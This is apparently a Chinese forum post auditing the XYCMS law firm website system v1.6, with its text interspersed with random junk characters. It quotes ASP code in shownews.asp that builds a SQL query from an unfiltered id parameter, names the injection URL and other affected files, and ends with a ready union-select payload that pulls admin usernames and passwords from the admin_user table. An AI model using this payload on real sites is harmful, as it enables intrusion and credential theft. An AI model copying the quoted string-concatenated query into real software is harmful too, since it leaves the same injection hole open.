前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似4 [ m' h1 P# M/ F& E, d( Q
& i# M, M- g5 Z) l( c
淫荡分割线9 I) s1 {$ @* X$ K
--------------------------------------------------------% D1 e7 h+ d5 \
& [' W) D& r, a/ `8 R1 ~/ d: g审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
+ B- m8 R1 M8 t Q! Y源码地址:http://down.chinaz.com/soft/29233.htm
) h; Q# B+ g4 ]! L! c; I
4 J/ G, V8 E0 G3 f漏洞文件:shownews.asp9 P! U u/ {+ P2 M, E
漏洞代码:7-13行
& Z3 C& w( A2 B$ D : U/ b+ j+ u" F% K& O; g3 n
. I, Y9 B: L" T. y$ H+ K+ _& j
<%
4 ^; b( N d3 P; a( W5 Fid=request.QueryString("id")$ f3 h1 `: d0 A; g& { }! ^! C$ ^' z
. o6 U, l7 ?( {( m* m% w
set snews=server.createobject("adodb.recordset") . I; b* c5 D, |- ?' s
exec="select * from [news] where id="&id7 s4 W! U/ ]! w
snews.open exec,conn,1,1
2 p& k% ?, P* _3 h5 n; S' d%>
8 C; z$ T% \9 F( ?" [7 {# E . j$ O1 H" Z$ v
9 k3 h; k- ~8 Y5 Y2 @6 U7 y什么过滤都没有 直造成注入! |3 d' J8 ^) {' r
& H/ J! u3 F* D9 ]# k注入点:http://127.0.0.1:99/shownews.asp?id=xx
9 [; T. U5 Z, t6 j) L q) A# S$ o6 U3 X
% P8 P! ? b# e1 X6 W- n! U' }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
/ {. x. ~' K0 S " C, _# l7 `% A5 f1 C0 F; Q V$ ^
+ y/ Z8 H1 O: l* v0 p4 g0 T
exp: union select 1,admin,password,4,5,7 from admin_user; v% I* I' o/ |3 I. r) {
3 h# a) {. {1 c4 u
|